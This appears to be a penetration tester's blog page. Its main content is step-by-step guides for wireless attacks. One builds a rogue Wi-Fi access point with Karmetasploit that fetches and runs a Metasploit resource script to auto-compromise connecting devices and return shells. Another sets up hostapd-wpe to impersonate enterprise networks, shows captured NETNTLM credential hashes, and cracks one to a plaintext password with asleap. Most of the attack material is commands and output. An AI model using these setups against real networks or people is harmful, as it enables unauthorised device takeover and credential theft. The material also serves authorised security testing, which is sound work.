‘Evil’ Hack Uses Wi-Fi to Destroy Your iPhone—Maybe

Patrick Kelley mentioned in…

Security experts have found a way for a malicious hacker to dupe unwitting iPhone or iPad owners into connecting to nefarious Wi-Fi networks and potentially bricking their devices. What’s worse, those security researchers, who include Brian Krebs, among others, say that the “evil” hack is shockingly “simple” for a hacker to wreak havoc on iOS device owners.

According to Krebs, iOS comes with a feature that automatically connects a device to a wireless network it’s previously connected to, which sits at the center of the problem.

Read More

Auto-Compromising Devices with Karmetasploit

For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers.  For this reason, I’ve begun using kits such as Karmetasploit.  Leveraging a Raspberry Pi and Metasploit, allows for instant shells and pillaging of data. Using nothing more than a RaspberryPi, Alfa antenna and a internet connection.

Here is how you do it…

Install Raspbian on a Pi2 or greater.  Once this has been done, apply all of the available updates.

sudo apt-get update && apt-get -y upgrade && apt-get -y install vim

Next, install dnsmasq.  This will be used for DNS resolution and DHCP address handouts.

sudo apt-get -y install dnsmasq

Once it is installed, configure dnsmasq by performing the following:

vi /etc/dnsmasq.conf

Update it to include the following at the top:

 

# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
interface=at0
#interface=wlan0mon
#interface=wlan0

# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
# service.
dhcp-range=10.10.10.50,10.10.10.150,12h

Next, install Aircrack-ng by doing the following:

sudo apt-get -y install aircrack-ng

Once this is in place, you will need to create the proper rules to forward all “hooked” traffic.  You can do this by issuing the following commands:

modprobe iptable_nat
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Okay, time to start hooking devices…

Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests.  Issue the following command.  It will also create a new interface named at0:

airbase-ng -P -C 30 -e “linksys” -v wlan0mon

If done properly, you will see something similar:

Screen Shot 2016-03-17 at 4.46.40 PM

Open a second terminal window, issue the following to configure the interface on at0:

ifconfig at0 up 10.10.10.1 netmask 255.255.255.0

Restart dnsmasq:

service dnsmasq restart

Finally, begin autopwning devices by issuing the following command:

cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt

If done properly, you should see the following:

Screen Shot 2016-03-17 at 4.58.32 PM

You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser.  It should reveal the following:

image

When successful, shells will be returned into the second console window that should be running Karmetasploit.

Quick Install Script – Network Assessment Tools

When you land in a foreign/client environment for an engagement, you don’t have access to your own toolkit. For this reason, I’ve created this single shell script that will install the basic tools and a few items that I use on every security assessment. As always, learn each one of these tools on your own machines as I’d rather not see you go to prison. (Some sourced from NASA cryptobin dump)

This script has been testing on Debian and Ubuntu.

https://gist.github.com/logikphreak/6742986688ed86ac0efa

Cracking WiFi – Enterprise

WifiUsing hostapd-wpe which implements an IEEE 802.1x Authenticator and Authentication Server for impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

Installation is relatively simple, but might encounter some hiccups in Ubuntu/Debian/Kali. To aid in getting you up and running, I’ve created the following guide.

Installation

Load Dependancies:
apt-get install libssl-dev libnl-dev

Install and patch hostapd by doing the following:
git clone https://github.com/OpenSecurityResearch/hostapd-wpe
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz
cd hostapd-2.2
patch -p1 < ../hostapd-wpe/hostapd-wpe.patch

Stage and perform configuration steps:
cd hostapd
make
cd ../../hostapd-wpe/certs
./bootstrap
cd ../../hostapd-2.2/hostapd
vi hostapd-wpe.conf

Change the following:
interface=eth0 to interface=wlan0 (or the interface of choosing)
change driver=wired to #driver=wired
uncomment all 802.11 options and define the SSID you wish to “man-in-the-middle”

Run the following to eliminate errors on start:
sudo nmcli nm wifi off
sudo rfkill unblock wlan
sudo ifconfig wlan0 10.15.0.1/24 up
sleep 1

Run the application by doing the following:
sudo ./hostapd-wpe hostapd-wpe.conf

As clients connect, you will see something similar to the following in hostapd-wpe.log:
root@shapeshifter:/opt/hostapd-2.2/hostapd# tail -f hostapd-wpe.log
challenge: d1:a3:22:c0:ba:e3:9d:94
response: c3:fb:98:0c:c9:f0:5b:56:1f:a8:dd:ce:3e:be:cc:36:b1:28:29:61:c3:cd:52:1f
jtr NETNTLM: pkelley:$NETNTLM$d1a322c0bae39d94$c3fb980cc9f05b561fa8ddce3ebecc36b1282961c3cd521f
mschapv2: Wed Mar 11 11:19:50 2015
username: pkelley
challenge: 91:f4:22:b5:24:14:15:56
response: 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48
jtr NETNTLM: pkelley:$NETNTLM$91f422b524141556$71e9f0359668b756ecabb57eda5bc4ef6f4921d135390648

Use asleap to crack this passwords, using word lists:
format = asleap -C (challenge) -R (response) -W (wordlist)

Example:
asleap -C 91:f4:22:b5:24:14:15:56 -R 71:e9:f0:35:96:68:b7:56:ec:ab:b5:7e:da:5b:c4:ef:6f:49:21:d1:35:39:06:48 -W /opt/SecLists/Passwords/rockyou.txt

Output:
asleap 2.2 – actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with “/opt/SecLists/Passwords/rockyou.txt”.
hash bytes: d86c
NT hash: 8c3efc486704d2ee71eebe71af14d86c
password: Password1234

Penetration Testing Platform Quick-load – Kali

pentestWhen pentesting in groups or managing a small team of assessors, one of the primary challenges is quickly getting everyone on the same page.  This isn’t possible on all levels.  However, it is our hope that this quick github script can at least get your toolkit close to a standard or in the event of a hardware failure, get you back up and running quickly.

As always, free to fork the github repo and improve upon it.

Installation:

  1. Perform a base-build of Kali Linux.
    Downloadable from here: Kali
  2. Navigate to /opt/
  3. Issue the following command: git clone https://github.com/logikphreak/kali-setup.git
  4. Issue this last command: sh core.sh

You will be prompted for a few platform specific details, but the generally answer will be “Debian”.